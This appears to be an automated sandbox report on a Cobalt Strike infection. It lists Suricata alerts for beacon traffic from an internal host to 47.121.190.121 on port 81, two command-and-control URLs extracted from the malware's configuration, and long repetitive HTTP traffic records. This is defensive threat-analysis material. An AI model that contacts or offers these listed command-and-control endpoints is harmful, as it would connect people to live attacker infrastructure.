Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50159 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50186 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50165 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50205 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50126 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50124 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50099 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50182 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50216 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50162 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50146 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50200 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50187 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50197 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50192 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50148 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50090 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50100 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50139 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50170 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50140 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50157 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50144 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50106 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50180 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50167 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50183 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50210 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50194 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50175 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50211 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50196 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50075 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50154 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50191 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50184 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50143 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50198 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50121 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50203 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50149 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50134 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50171 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50172 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50201 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50147 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50177 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50158 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50163 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50115 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50213 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50130 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50206 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50212 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50098 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50209 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50190 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49898 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50202 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50188 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50150 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50141 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50181 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50120 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50122 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50128 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50185 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50204 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50195 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50151 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50207 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50153 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50127 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50160 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50142 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50208 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50214 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50155 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50168 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50152 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50050 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50173 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50178 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50066 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50137 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50174 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50189 -> 47.121.190.121:81
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50215 -> 47.121.190.121:81

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://7.121.190.121:81/aGDq
Source: Malware configuration extractor	URLs: http://47.121.190.121/aGDq

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 50066 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 50082 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 50086 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 50087 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 50088 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 50092 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 50098 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50098
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50099
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 50101 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 50103 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 50110 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 50111 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 50115 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 50119 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 50123 -> 81
